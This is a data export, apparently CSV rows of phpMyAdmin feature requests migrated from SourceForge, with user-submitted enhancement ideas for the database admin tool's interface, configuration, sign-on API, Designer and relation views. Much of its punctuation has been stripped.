I would like for those additional fields to be shown in the user management module Privileges), and in the forms used to create and edit users.
I m sure others would benefit from this feature as well.
Original URL https sourceforge.net p phpmyadmin feature requests 1194 Original author ygirouard","enhancement"
"24444","5889","Disable field type column in data insert edit .
While editing inserting a dataset into a table it should be possible to disable the view of the field type row.
Reason for disabling this row can be a small monitor resolution, which prevents from increasing size of value column.
Maybe adding a new configuration parameter cfg[ ShowFieldTypesInDataEditView ] = false; As far as I know there are two occurrences output of table header, output of table body) in tbl change.php to edit.
On a side note Why is value for CharTextareaCols limited to 40 hard coded) although it is not mentioned in any doc?
Original URL https sourceforge.net p phpmyadmin feature requests 1195 Original author papiercorpse","enhancement"
"24444","5890","Add an ajax search tool to be able to quickly find ids.
Sometime you have many relationships in a table, and you need to insert data.
It becomes a painful task when you constantly have to go check the ids of your parent rows for each foreign keys.
Is there a tool that make this task easier, by allowing me to do a kind of ajax search for ids while I am inserting data?
For exemple, if I would add a message, I would do an ajax search for the author Steve .
and it would return a list of authors with the name Steve along with their id and other columns.
I could then choose the right row and column and the id would be added to the field Original URL https sourceforge.net p phpmyadmin feature requests 1189 Original author anonymous","enhancement"
"24444","5891","Insert ignore.
Can an option be added to the insert page to use insert ignore instead of insert .
Perhaps the drop down that has the Insert a new row option could also have Insert ignore a new row .
Original URL https sourceforge.net p phpmyadmin feature requests 1190 Original author fisharebest","enhancement"
"24444","5892","ON DUPLICATE KEY UPDATE for loading CSV.
INSERT ... ON DUPLICATE KEY UPDATE is useful when man wants to update table with foreign keys from CSV file.
REPLACE won t work in this case as it first deletes the row and then reinserts it, what breaks constraints.
Original URL https sourceforge.net p phpmyadmin feature requests 1192 Original author nijel","enhancement"
"24444","5893","Single Row Editor Value column too small.
When editing a single row, the value column is too small when a binary field is shown as hex.
Original URL https sourceforge.net p phpmyadmin feature requests 1193 Original author olafvdspek","enhancement"
"24444","5894","LeftFrameTableSeparator should not group with one.
The LeftFrameTableSeparator Function is really nice.
only one thing s annoying if there is only one table in a group, it is useless to make a group at all.
the feature should only group tables, if there are more than one with the same prefix Original URL https sourceforge.net p phpmyadmin feature requests 1203 Original author rubo77","enhancement"
"24444","5895","add class to icon for table view.
line 612 of navigation.php pma 3.2.5) quick access icon next to each table name echo lt;li gt; .
\n ; echo lt;a title= .
htmlspecialchars link title) please add a class to the icon quick access icon next to each table name echo lt;li gt; .
\n ; echo lt;a class= recordiconthingclass title= .
htmlspecialchars link title) this is to help with the themeing.. i want the link to be display block if the icon has a class i can move the ocon to the left via css.. without a way to refrence the icon im stuck with the default haveing to move the cursor onto the text instead of the whole line before clicking thanks Original URL https sourceforge.net p phpmyadmin feature requests 1204 Original author williamstam","enhancement"
"24444","5896","signon auth method too limited.
The signon auth type allows user to pass login password hostname only.
While if mysql site has grant for user with REQUIRE SSL then you also need to pass ssl flag just like cfg[ Servers ][ i][ ssl ] in config).
Unfortunately signon auth API is quite limited and doesn t allow to do that.
Suggested fix Change signon API to allow to pass ANY cfg flag in some way.
That would allow for external signon script to fill all required configuration data that mysqladmin would later use.
Same applies to choosen language interface.
Right now there is no sane way to specify language via signon API.
Original URL https sourceforge.net p phpmyadmin feature requests 1196 Original author arekm","enhancement"
"24444","5897","export users associated with a specific schema database.
Hello, it would be very convenient if there was the ability when exporting a schema database users and their privileges associated with it to also be exported in the output .sql file.
It would be very helpful because every time restoring a database in a different instance requires manual creation of all users and their privileges in the new instance.
It will save us a lot of time especially when moving many databases with many different users attached on them.
thank you very much.
Original URL https sourceforge.net p phpmyadmin feature requests 1207 Original author jimmyp2","enhancement"
"24444","5898","No error information provides with signon API.
If we use signon API and mysqladmin has some problems connecting remote site then it redirect us back to our signon url but doesn t provide any information about errors.
So we can t display error message for user.
Fix provide error messages in session or via some other way.
Original URL https sourceforge.net p phpmyadmin feature requests 1197 Original author arekm","enhancement"
"24444","5899","a show 500 Button.
i often need the show all button, but a show 500 Button would be nice if there are not so many records, it will work like the optional) show all button and if there are more than 500 records, it is better than a show all button, cause it creates less server load Original URL https sourceforge.net p phpmyadmin feature requests 1198 Original author rubo77","enhancement"
"24444","5900","Add more documentation links to SQL parser.
Currently SQL pretty printer shows documentation links to just few basic constructs, but it should do much more functions, operators, ...).
Original URL https sourceforge.net p phpmyadmin feature requests 1199 Original author nijel","enhancement"
"24444","5901","Automatic MIME type for field download.
The current field download script returs application octet stream for all data now.
It should be possible to detect at least some useful file formats eg.
images such as png or jpeg) and send appropriate MIME type in headers.
Original URL https sourceforge.net p phpmyadmin feature requests 1200 Original author nijel","enhancement"
"24444","5902","hidden features in config.sample.inc.php.
It would be nice to have a section with the most important hidden features of PMA in the sample config file, also a hint, where to find more features.
this would be the code, i would add most common Advanced phpMyAdmin features cfg[ ShowAll ] = TRUE; Defines whether a user should be displayed a show all records) button in browse mode or not.
cfg[ MaxRows ] = 50; Number of rows displayed when browsing a result set.
If the result set contains more rows, Previous and Next links will be shown.
cfg[ LightTabs ] = TRUE; If set to TRUE, use less graphically intense tabs on the top of the mainframe.
cfg[ QueryWindowHeight ] = 388; Height of Query window cfg[ QueryHistoryDB ] = TRUE; is set to lt;tt gt;TRUE lt; tt gt;, all your Queries are logged to a table, which has to be created by you see cfg[ Servers ][ i][ history ]).
If set to FALSE, all your queries will be appended to the form, but only as long as your window is opened they remain saved.
cfg[ SQLValidator ][ use ] = TRUE; use the SQL Validator cfg[ SQLQuery ][ Validate ] = TRUE; Whether to display a link to validate a query in any SQL Query box.
See also cfg SQLValidator in the Documentation you can modify the order for Select options in the search view cfg[ TextOperators ] = array LIKE ... , LIKE , NOT LIKE , = , != , REGEXP , NOT REGEXP , = , != ); more features in libraries config.default.php Original URL https sourceforge.net p phpmyadmin feature requests 1201 Original author rubo77","enhancement"
"24444","5903","more help in chk rel.php.
if the pmatables are not set, here is th link to chk rel.php on the pma main page The additional features for working with linked tables have been deactivated.
To find out why click here.
, which is nice but on that page, it only checks the variables, and there is no helpful info how to solve it fast.
only the link to the documentation, which is quite big.
there should be this sentence on the top To enable the advanced features, you have to configure the variables in your config file 1\.
create the needed tables with the script create tables.sql 2\.
create a pma user and give access to that tables 3\.
create a config.inc.php like config.sample.inc.php in the main directory of PMA 4\.
uncomment the lines for the advanced features there.
Original URL https sourceforge.net p phpmyadmin feature requests 1202 Original author rubo77","enhancement"
"24444","5904","pma history.
Select what SQL query is logged into pma history in configuration file.
Like limit it only for non SELECT queries, only UPDATE and INSERT queries, or only for queries for editing records in tables but no queries ALTERing, CREATE or any other way change db structure.
Original URL https sourceforge.net p phpmyadmin feature requests 1205 Original author andzinsan","enhancement"
"24444","5905","config switch to make insert as new row default.
please add a config switch to make insert as new row a default in when changing tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1206 Original author anonymous","enhancement"
"24444","5906","linking from information schema.
it would be nice if results from querying the information schema database would link back to the relevant pages within phpmyadmin for example, querying table columns entries under table schema could link to db.php?db=[dbname] entries under table name could link to db.php?db=[dbname] table=[tablename] entries under column name could link to alter tbl.php?db=[dbname] table=[tablename] field=[fieldname] this would greatly simplify editing the same set of tables within different databases to make the sets consistent.
Original URL https sourceforge.net p phpmyadmin feature requests 1208 Original author iinl","enhancement"
"24444","5907","Automatic table alias in SQL query area.
When I write SQL queries involving multiple tables, I usually have to start by adding table aliases to the SQL code in the query area manually.
After adding table aliases e.g.
prefixing a columns in the customer table with c. ) a few million times, I have been thinking that it would be better if PhpMyAdmin could do it automatically?
Automatic table aliasing is one of the huge time savers when using the query GUI in MS Access.
Example Instead of a default Default Query Table created by a setting like cfg[ DefaultQueryTable ] = SELECT \n\t f FROM d. t \n WHERE 1 \n; SELECT id, firstName, lastName, employment date FROM test.customers ; PhpMyadmin could write a default query like this....
SELECT c.id, c.firstName, c.lastName, c.employment date FROM test.customers c ; Maybe a column s table default table alias may default to the first letter of the table name, unless a table alias is stored in a e.g.
pma table alias Original URL https sourceforge.net p phpmyadmin feature requests 1209 Original author konghara1d","enhancement"
"24444","5908","wrapping enum values.
Wrap the enum values while displaying the table structure.
This helps compacting of HTML table so we don t have to scroll horizontally.
This can be achieved by a small change in PMA extractFieldSpec function in libraries common.lib.php spec in brackets = chop substr fieldspec, first bracket pos 1, strpos fieldspec, ) ) first bracket pos 1))); spec in brackets = str replace , , , , spec in brackets); Adds a space after , to allow wrapping Original URL https sourceforge.net p phpmyadmin feature requests 1210 Original author kgsrirama","enhancement"
"24444","5909","Drag n Drop Database Creation.
Drag n Drop Database creation will be a coll feature to add to PMA, it could be something Like MySql Workbench.
With advanced javascript libraries like Jquery and JqueryUI, i think it is possible and can be implemented.
Original URL https sourceforge.net p phpmyadmin feature requests 1222 Original author swvist","enhancement"
"24444","5910","after import also list uploaded filename.
Normaly when uploading importing you get a message after the import has ended like dutch) Import is geslaagd, 300 queries uitgevoerd but i d like to have the filename attatched to it, so i an see wich file i ve uploaded last.
So i don t upload files twice.
Original URL https sourceforge.net p phpmyadmin feature requests 1211 Original author ericbruggema","enhancement"
"24444","5911","Focus TEXTAREA sql query on click on SQL link.
To run SQL query in phpMyAdmin, 2 clicks are required 1\.
On SQL link on the top points to server sql.php ), 2\.
On TEXTAREA below to focus it.
Suggestion is to do 2nd action automatically in Javascript.
Original URL https sourceforge.net p phpmyadmin feature requests 1212 Original author fedushin","enhancement"
"24444","5912","Don t hide space usage and stats by default).
Would it be possible to not hide space usage and stats by default?
I hate the extra clicks required...
If not, is there a setting to disable this?
Original URL https sourceforge.net p phpmyadmin feature requests 1213 Original author olafvdspek","enhancement"
"24444","5913","Bookmark Export Import settings.
Suggestion is to let users bookmark their Export and Import settings.
Many admins developers have several frequently used export import schemes of their own.
Why not to support storing these numerous parameters in phpmyadmin DB.
All settings in Export or Import tabs should be stored by entering new bookmark s name into a field similar to bkm label in SQL tab.
Original URL https sourceforge.net p phpmyadmin feature requests 1214 Original author fedushin","enhancement"
"24444","5914","Show all defined servers in Synchronize tab.
Currently the only items shown in listboxes under Source database and Target database labels in Synchronize tab are Current server Remote server .
It s not the best solution, because 1\.
I can t select both source target from servers defined in config.inc.php, 2\.
Terms are inaccurate there s no need for the other not current) server to be Remote .
It would be reasonable to fill the listboxes with all servers defined in config.inc.php, plus item Other server .
Original URL https sourceforge.net p phpmyadmin feature requests 1215 Original author fedushin","enhancement"
"24444","5915","Automate database deployment.
This request is continuation of Feature request 2964441 see https sourceforge.net tracker ?func=detail aid=2964441 group id=23067 atid=377411).
Synchronization, the excellent phpMyAdmin s feature, has some lack of flexibility.
It just synchronizes one DB into another, but very frequenly the task is far more complex.
F.e., not all tables in source database must be transferred, or brute synchronization fails because of different source target server versions, etc.
Suggestion is to let user fine tune export import parameters.
Let s add under listboxes Server Database src type , src db sel , trg type trg db sel ) a new pair of listboxes with previously bookmarked Export Import templates see Feature request 2964441).
That will entirely automate the complex database deployment process.
It is very needed!
The intermediate file exported from source database) should be saved with unified name on phpMyAdmin s host machine.
Its name and other details of this complex procedure) must be reported to user.
The further development of idea is to let user bookmark deployment parameters, i.e.
store source target servers databases, and export import templates.
Original URL https sourceforge.net p phpmyadmin feature requests 1216 Original author fedushin","enhancement"
"24444","5916","Improved vendor config.php.
Use a vendor config.php seems a great idea for packager.
It seems a new option to store path to the config.inc.php will be usefull.
Linux distribution which respect the FHS store this file in etc Fedora use etc phpMyAdmin, p.e.)
This will avoid to use a link from etc phpMyAdmin config.inc.php to usr share phpMyAdmin config.inc.php The attached quite trivial) patch create this new entry CONFIG FILE) and use it in common.inc.php) Regards Original URL https sourceforge.net p phpmyadmin feature requests 1217 Original author remicollet","enhancement"
"24444","5917","Go to Browse page on clicking on Table list.
When database is selected upper serverinfo DIV shows smth like Server localhost Database arcadius ), clicking on row in table list outside other controls f.e.
clicking on table name) runs rather rarely needed action row becomes un)selected, checkbox at its left un)checked.
Suggestion is to do in this case more frequently required action select table in phpMyAdmin go to its Browse page.
Original URL https sourceforge.net p phpmyadmin feature requests 1218 Original author fedushin","enhancement"
"24444","5918","horizontalflipped doesnt work in firefox.
it would be nice to have an auto detection, if the head in horizental has less characters than the longest field content below, it should smartly stay horizontly, if it has more chars, it should flip vertical also there should be an autodetection if you are using firefox or IE if you set cfg[ DefaultDisplay ] = horizontalflipped ; or = vertical ; at the moment it sais table header rotation via faking or CSS?
css|fake) NOTE CSS only works in IE browsers!
cfg[ HeaderFlipType ] = css ; but this should be default = fake if CSS only works in IE browsers!!!
;) Original URL https sourceforge.net p phpmyadmin feature requests 1219 Original author rubo77","enhancement"
"24444","5919","SMART config order should sort keys in DESC order too.
if i set default for ORDER BY clause valid values are ASC , DESC or SMART ie descending order for fields of type TIME, DATE, DATETIME TIMESTAMP, ascending order else ) cfg[ Order ] = SMART ; it only counts for time and date fields, but the most clicks i have to do is when i go into a database table is to click two times on the id field it would be nice to have SMART to deal with fields that are numeric in DESC order too.
or just fields with the fieldnames id , index , idx and key Original URL https sourceforge.net p phpmyadmin feature requests 1220 Original author rubo77","enhancement"
"24444","5920","Preferences page.
there should be a preferences page, accessible from the main page for the root user.
a lot of configure options could be moved there from the config.default.php.
for example most options, i suggested here https sourceforge.net tracker ?func=detail aid=2937840 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin feature requests 1221 Original author rubo77","enhancement"
"24444","5921","live feed of database changes using AJAX.
A page should be created where one can see a live stream of all database changes that are being made.
This would be very useful in a development setting, so that when one tests an application, they can easily see whether appropriate changes are happening in the database with out having to do any navigation or refreshing.
This would also be useful in a deployed application to see the kind of activity taking place.
This could probably be implemented using AJAX.
Original URL https sourceforge.net p phpmyadmin feature requests 1223 Original author deepakjoy","enhancement"
"24444","5922","store selected columns).
this would be very useful if you have a table with lots of fields and you only want to see some fields by default for example you have a table `userdata` with the fields `id`, `name`, `tel`, `bla in`, `bla2 id`, `bla3 id`, `lots of uninteresting stuff`, ..., `created` instead of SELECT FROM `userdata`; this default query would be perfect SELECT `id`, `name`, `tel`, `created` FROM `userdata`; you could implement it maybe here there is a section Select fields at least one) ... in the search page for a table at the bottom if you click on Options there could be an extra button store as default which would make the selected fields as default query for this table at least it could store the selection for future searches with the search form) Original URL https sourceforge.net p phpmyadmin feature requests 1224 Original author rubo77","enhancement"
"24444","5923","Going down in PK >> FK hierarchy.
With pmadb database configured, phpMyAdmin supports going up , FK gt; gt; PK in Browse mode.
Values in every Foreign Key column are links for viewing the record with corresponding Primary Key.
The suggestion is to realize also going in reverse direction down in this hierarchy.
If the table contains PK constraints, let s add new icon near pen b edit.png) to every record to the bottom of the Browse page.
If the table contains only one PK, this new icon should be a link to Browse page with FK table filtered by clicked PK.
To browse FK rows attached to a group of PKs, user may mark rows with that PKs click icon at the bottom of the page.
Otherwise the table contains several PKs) let s add a little menu dropping down from new icon on hover or on click.
So user can click icon select which FK table to browse.
Original URL https sourceforge.net p phpmyadmin feature requests 1225 Original author fedushin","enhancement"
"24444","5924","Tables maintenance for entire DB.
When table is selected, there s tab Operations with in particular) useful block Table maintenance .
For different table types this block contains some combination of Check table MyISAM, InnoDB Defragment table InnoDB Analyze table MyISAM Repair table MyISAM Optimize table MyISAM, InnoDB Flush the table FLUSH ) MyISAM, InnoDB, MEMORY.
Each item contains help link to http dev.mysql.com.
On Check table help page http dev.mysql.com doc refman 5.1 en check table.html) users posted a lot of comments showing that they love to 1\.
Run CHECK TABLE query for all tables in DB, 2\.
Cron it.
The 2nd is out of phpMyAdmin s competence, but not the 1st.
Suggestion is to add block Tables maintenance to Operations tab when DB is selected.
For each item inside block, count how many tables in DB have type that support it.
If none hide item, else show number of tables that will be affected by operation, in brackets.
Original URL https sourceforge.net p phpmyadmin feature requests 1226 Original author fedushin","enhancement"
"24444","5925","SQL tab allow Tab, Enter to submit.
On a database page, the SQL tab allows Tab, Enter to submit the form.
On a table page, this doesn t work because there is the fields list.
Could this be fixed?
Original URL https sourceforge.net p phpmyadmin feature requests 1244 Original author olafvdspek","enhancement"
"24444","5926","Visual Programming feature for SQL queries.
I would like to have a better code editor for the SQL command execution.Or it would be better to have commonly used command ,Such as INSERT , DELETE to be used as visual Programming, i.e someone can write a query using a graphical menu).
So for a novice it would be fun and easy to understand,And for an expert we can provide custom menu which can build advanced queries customizing those simple queries easily.
This would be an improvement on the interface for the prevailing feature.
Original URL https sourceforge.net p phpmyadmin feature requests 1227 Original author shelanrc","enhancement"
"24444","5927","DB design hint too many TEXT columns.
Problem In case of too many TEXT BLOB columns in a table, a data insert could end up on error 139.
The number of columns could be as low as 10! )
http bugs.mysql.com bug.php?id=1611 http bugs.mysql.com bug.php?id=10035 Conditions any version of MySQL mine is 5.1.30) limit depends on storage engine InnoDB is affected more) Proposal PMA will issue a warning on table page about this little known restriction.
User is aware and could do prevent it in early stage of db design, or before production use hits that. )
for InnoDB.
768 chars is used one utf8 TEXT field that means 7680 chars for 10 such fields add few other fields and you hit the limit 8000 chars half of database page).
Ten TEXT fields are ok in circumstances when some of the values are NULL or we don t use utf8 then limit raises to cca 15 fields).
for MyISAM is similar limit higher, at cca 85 fields.
http bugs.mysql.com bug.php?id=21101 c80978 Such behavior of PMA would be a lifesaver for most people that don t know that such limit exists and later could save them database redesign need.
Original URL https sourceforge.net p phpmyadmin feature requests 1246 Original author anonymous","enhancement"
"24444","5928","make SMART the default sort order cfg[ Order ]).
ASC is still the default sort order although everyone is annoyed always to have to click twice to see the latest entries.
so SMART should be default in config.
also have a look at my patch to easily enhance the sort order https sourceforge.net tracker index.php?func=detail aid=2972985 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin feature requests 1228 Original author rubo77","enhancement"
"24444","5929","Upgrade TCPDF.
Currently TCPDF emmits warnings with current PHP, I guess this is fixable by upgrading TCPDF.
in .
libraries tcpdf tcpdf.php 3158 Function set magic quotes runtime ) is deprecated Backtrace .
libraries tcpdf tcpdf.php 3158 set magic quotes runtime ) .
libraries tcpdf tcpdf.php 3351 TCPDF gt; putfonts ) .
pdf schema.php 383 TCPDF gt; putresources ) .
libraries tcpdf tcpdf.php 3468 PMA PDF gt; putresources ) .
libraries tcpdf tcpdf.php 1406 TCPDF gt; enddoc ) .
libraries tcpdf tcpdf.php 2962 TCPDF gt;Close ) .
pdf schema.php 970 TCPDF gt;Output string swamp SWAMP 2.pdf, string I, ) .
pdf schema.php 1110 PMA RT gt;PMA RT showRt ) .
pdf schema.php 1407 PMA RT gt; construct string 3, integer 0, integer 1, integer 0, integer 0, string L, string A4, integer 0, ) Original URL https sourceforge.net p phpmyadmin feature requests 1229 Original author nijel","enhancement"
"24444","5930","Show bookmarks on browse page.
there should be an option to set default view when clicking on browse button on the left.
For example I have a table and i always need it to be sorted in reverse order.
So on the right I need a button Use this query a default for this table and this query should be used every time i click in the left tree.
Something like that would be very useful, it very annoying to set sort options for the same table again and again.
Also options like Partial Texts Full Texts should be remembered, it s very annoying to switch all the time to Full texts Also there should be an options to hide certain columns of a table, so there can be some sort of short and full columns view.
Thanks a lot Original URL https sourceforge.net p phpmyadmin feature requests 1249 Original author freeman3","enhancement"
"24444","5931","Replace datetime editor with jQuery datepicker.
It would be good to use jQuery datepicker instead of our own calendar.
However there is problem that datepicker does not seem to support editing of time so this support needs to be added somehow to it.
http jqueryui.com demos datepicker Original URL https sourceforge.net p phpmyadmin feature requests 1230 Original author nijel","enhancement"
"24444","5932","Validate manual date time input.
I m using phpMyAdmin for last few years and i have modified few things in order to make things easy for me.
This year i would like to participate in gsoc as well.
I would like to share those improvements if it is useful for everyone who uses phpMyAdmin.
When entering date time value in the textbox if the user enters some invalid values mistakenly no errors thrown.
When we are executing the insert update the error is shown as mysql sql error, which takes too much time of the users when they make mistakes.
Therefore what i did with my phpMyAdmin is that, when enters the date time manually it will validate using javascript and show the error instantly.
Therefore it saves more time and improve the phpmyadmin interface as well.
In future validating the necessary fields using javascript will provide an easy and speedy access to all the users.
I have attached the modified file that I m using now and hope it will be useful for others as well.it also can be enhanced more.. Its just my opinion.
If it is wrong please kindly forgive me.
Thank you Original URL https sourceforge.net p phpmyadmin feature requests 1231 Original author sutharshan02","enhancement"
"24444","5933","Improve labels in relation view.
In Structure gt; Relation view mode The column with Primary Keys from other tables contains 3 HTML lt;select gt;s per row) has wrong caption FOREIGN KEY INNODB) .
It is ambiguity; label FOREIGN KEY must be moved to the left or deleted, and column on the right must be PRIMARY KEY INNODB) .
Additionally, box s label Links to may be changed to Foreign key constraints .
That would be more straightforward.
Original URL https sourceforge.net p phpmyadmin feature requests 1232 Original author fedushin","enhancement"
"24444","5934","Relation view drop down lists.
Some remarks about drop down lists HTML lt;select gt;s) in Structure gt; Relation view mode 1\.
Every lt;option gt; column s full name) starts with the name of current database is it required?
For MySQL, not.
2\.
It would be more user friendly to show table column hierarchy in lists by HTML tag lt;optgroup gt;, than by using syntax db name.table name.column name .
Original URL https sourceforge.net p phpmyadmin feature requests 1233 Original author fedushin","enhancement"
"24444","5935","Improve ON DELETE ON UPDATE in relation view.
If current ON DELETE or ON UPDATE action set to default RESTRICT ), the corresponding lt;select gt; is blank, doesn t display RESTRICT .
And, what the blank lt;option gt; is there for?
Original URL https sourceforge.net p phpmyadmin feature requests 1234 Original author fedushin","enhancement"
"24444","5936","Unite Structure and Relation view.
The suggestion is to move all content of Relation view page to the end of Structure tab, unite these 2 pages.
Foreign key constraints are the most important part of DB structure, along with columns indices.
Let users see them at once, without clicking on Relation view link.
Original URL https sourceforge.net p phpmyadmin feature requests 1235 Original author fedushin","enhancement"
"24444","5937","Designer missing tabs and breadcums navigation.
Because designer is missing tabs and breadcums navigation, there is no easy way to get back from it to other database tabs.
It still looks like a separate application not like something what is part of phpMyAdmin for several years.
Original URL https sourceforge.net p phpmyadmin feature requests 1258 Original author nijel","enhancement"
"24444","5938","Designer should ask for saving when leaving the page.
When leaving the designer page, it should ask for saving the layout as it would be lost otherwise.
Original URL https sourceforge.net p phpmyadmin feature requests 1259 Original author nijel","enhancement"
"24444","5939","Relation view multi column constraints not supported.
In phpMyAdmin, there s no possibility to add, edit or view foreign key constraints consisting of more than one column.
Original URL https sourceforge.net p phpmyadmin feature requests 1236 Original author fedushin","enhancement"
"24444","5940","Dry Run feature.
I d like to see a dry run feature.
A way to show affected rows without actually affecting them.
As a newbie developer trial and error is sometimes necessary and dry running the code would be a great feature to have in that regard.
Original URL https sourceforge.net p phpmyadmin feature requests 1237 Original author crenshawdk","enhancement"
"24444","5941","Angular links not saved in Designer.
When clicking on Angular links in Designer, saving, going anywhere else in phpMyAdmin, returning in Designer the links return to direct links.
Original URL https sourceforge.net p phpmyadmin feature requests 1238 Original author michelegaroche","enhancement"
"24444","5942","Let group tables views into folders .
Very often there s a large number of tables inside one database.
F.e., 20 30 tables may control site forum, 10 tables may refer to search engine, etc.
Moving logical groups of tables into separate databases is often bad solution, cos 1) complicates app portability, 2) many host providers limit DB number.
Sometimes there s table groups based on app logic.
F.e., some tables may contain abstract data, that must be accessible for daily customers only for reading.
During operations like GRANT privileges, Export Import selecting those groups manually over over again is inconvenient error prone.
The suggestion is to support packing similar tables into new PMA object, folder or directory , stored on pma db level.
A folder can contain tables views other folders.
When folder is pma current object 1\.
Its name appears in top div serverinfo .
This div now displays [server name] gt; [db name] gt; [folder s) path] gt; [current object s name].
2\.
Only folders tables views directly nested in it are visible on Structure tab.
Selecting checking on) folder on Structure tab for group operation means do that operation for all its direct indirect) child objects.
For organizing existing databases, support moving tables between folders.
phpMyAdmin is 1 panel manager, so move interface may be 1) check tables to move, on Structure tab, 2) Select in submit mult element new option, Move to folder , 3) When it s selected, display new lt;select gt; element filled with names of existing folders.
Maybe, the term folder should be replaced by directory or table group .
Original URL https sourceforge.net p phpmyadmin feature requests 1239 Original author fedushin","enhancement"
"24444","5943","Nav Frame Clean Up.
Would it be possible to re)move the following to give the table list some extra vertical space?
1\.
Logo, could it be moved to the home page?
2\.
Buttons, could they be moved to the top of the main frame?
3\.
Text Database, should be obvious 4\.
Text lt;database gt; lt;table count gt;), is shown in dropdown just above already Original URL https sourceforge.net p phpmyadmin feature requests 1240 Original author olafvdspek","enhancement"
"24444","5944","Browse Field > Search.
In the structure tab, each field has a browse command.
It would be great if the results table linked each result to a search for that value.
Original URL https sourceforge.net p phpmyadmin feature requests 1241 Original author olafvdspek","enhancement"
"24444","5945","Synchronize Show configured servers in select.
I am using multiple pre configured servers in the configuration, yet the Synchronize tool does not use them.
It would be nice if they could be included there, so it doesnt has to be entered manually.
Original URL https sourceforge.net p phpmyadmin feature requests 1271 Original author syphernl","enhancement"
"24444","5946","Work with skip grant tables.
phpMyAdmin currently fails to work when MySQL is started with skip grant tables see http dev.mysql.com doc refman 5.0 en server options.html option mysqld skip grant tables).
It might be useful for recovery to work in this state.
Original URL https sourceforge.net p phpmyadmin feature requests 1242 Original author nijel","enhancement"
"24444","5947","Add support fo JSON export import.
JSON is quite widely used serialisation format, it would be good to have support for export import it.
Original URL https sourceforge.net p phpmyadmin feature requests 1243 Original author nijel","enhancement"
"24444","5948","Tuning recommandation.
PhpMyAdmin may generate some tuning recommandation like mysqltuner or tuning primer output Original URL https sourceforge.net p phpmyadmin feature requests 1245 Original author anonymous","enhancement"
"24444","5949","Deleting tracked queries.
I find the new Tracking feature very useful.
I think it can be more flexible if there is a delete button at the left of each tracked query, so you can delete unwanted queries.
Thanks ) Original URL https sourceforge.net p phpmyadmin feature requests 1247 Original author asteddy","enhancement"
"24444","5950","Comfortable editing of serialize ) d data.
When storing objects into it s database, the CMS Drupal first stores each value for which a column exists into the corresponding column and uses the serialize ) function to store the remaining ones into a single, additional LONGTEXT column.
I expect other frameworks to behave similarly.)
Editing such a field by hand is quite painful, as one has to keep track of character counts, syntax, etc.
I d appreciate having a more comfortable way to edit them.
I wrote a Javascript to demonstrate what I m thinking of and tested it in both FF 3.5 and Chromium.
I guess a PHP only implementation would be more robust, since it can use PHP s native serialize ) implementation.
Also, my current version does not allow insertion deletion of fields.
I ll attach it as is needs to be included into tbl change.php) and as a patch against Commit da6cf1b878401b3f509c9294d46864b0d6bd82dd.
To test it, edit a row which contains a longtext field which contains JSON or serialize ) d data.
A link Edit serialized data should appear below the textfield, opening a JQuery dialog field when clicked upon.
Original URL https sourceforge.net p phpmyadmin feature requests 1275 Original author phillip berndt","enhancement"
"24444","5951","Optimize binlog view.
Please consider optimizing the binlog view to be better navigable like other tables) or maybe searchable.
Original URL https sourceforge.net p phpmyadmin feature requests 1248 Original author csware","enhancement"
"24444","5952","php.ini and MySql default configuration.
We would dearly like a Xampp version for use by non developers for standalone local use.
These users run HTML Javascript apps as stanadalone or on small LANs entirely behind the firewall.
The new Firefox 4 and Chrome 6 are becoming such a rich semipermanent to develop user interfaces for any application, not just web.
Problem is these users can never edit the config.
So the following defaults would be ideal.
php.ini extension=php dbase.dll dbase extension is start up option on linx) post max size=900M or no limit) upload max filesize=900M or no limit) memory limit=900M or no limit) max input time=36000 or no limit) max execution time=36000 or no limit) session.gc maxlifetime=36000 or no limit) mysql.connect timeout= 1 MySql Configuration ft min word len=3 default is 4) max allowed packet=16000000 default 1mb) I know that max execution time is needed to stop run away scripts but developers can change it where as casual users will not.
The php dbase.dll is a start switch on Linux.
This will be very useful for the next few years as the import from legacy xbase applications The max allowed packet is for the increasing use of MySql geometry field for GIS apps.
Original URL https sourceforge.net p phpmyadmin feature requests 1250 Original author stevesmith97","enhancement"
"24444","5953","Show Overhead with same precision for all tables.
I would like to see the Overhead column when viewing the list of all tables) be shown using ONE precision that is, all in K bytes, for example.
The reason is that, when scanning down that column to find tables that need attention, you are looking for large numbers.
But a table with 985.8 KiB catches the eye more readily than a table with 2.1 GiB.
Also, I don t really get the inclusion of the i in the above designations.
I mean sure, it makes sense with Kilobytes and Gigabytes but it really doesn t match Megabytes at all.
I think most people are used to seeing KB, MB, and GB.
The extra i is not really needed.
Original URL https sourceforge.net p phpmyadmin feature requests 1251 Original author extexan","enhancement"
"24444","5954","optimize page loading using AJAX.
to optimize the UI loading changing by using AJAX Original URL https sourceforge.net p phpmyadmin feature requests 1252 Original author brotherseven","enhancement"
"24444","5955","Show per table privileges.
Currently it is possible to see per database privileges on privileges tab for database, however there is no way to get this for table.
Either separate overview for table should be added or these could be listed on database overview as well.
http bugs.debian.org 595258 Original URL https sourceforge.net p phpmyadmin feature requests 1253 Original author nijel","enhancement"
"24444","5956","Add a credit section for documentation translators.
It would be nice to have a line in the main doc file to credit documentation translators.
Something like Translation into lt;LANGUAGE gt; by lt;whoever gt;.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1254 Original author psychictv","enhancement"
"24444","5957","Unhide hidden features.
It would be useful if on the first page there is a warning The advanced features are not enabled.
They include Designer Mode, Query History, Query Bookmarking and more.
Why?
Beacause very, very often phpMyAdmin installation proceeds in the following way tar zxf phpMyAdmin.tar.gz .
Nothing more.
No reading of readme.
No config poking.
I am using phpMyAdmin from 5 years and just today I learned about theese nice and useful features by accident.
Kudos to all devs!
Original URL https sourceforge.net p phpmyadmin feature requests 1255 Original author zebrabg","enhancement"
"24444","5958","Add option for ignoring foreign keys when drop table.
When you want to delete more tables which have relations in between, you either need a proper order what is sometimes not possible) or disable foreign keys for this operation.
I think having option for disabling foreign checks when dropping multiple tables would be better.
Original URL https sourceforge.net p phpmyadmin feature requests 1256 Original author nijel","enhancement"
"24444","5959","Default theme is older than the Internet.
phpmyadmin s default theme is not ready for world domination.
It s unappealing.
Please put one of these http www.phpmyadmin.net home page themes.php instead by default.
Original URL https sourceforge.net p phpmyadmin feature requests 1257 Original author another sam","enhancement"
"24444","5960","SQL syntax highlighting.
I thought it would be interesting to have a syntax highlighter in the SQL query window.
I made a quick patch to add CodeMirror http codemirror.net ).
Before submitting a patch, I d like to know I there are some rules concerning the use of external libraries, and where to put them in the source tree.
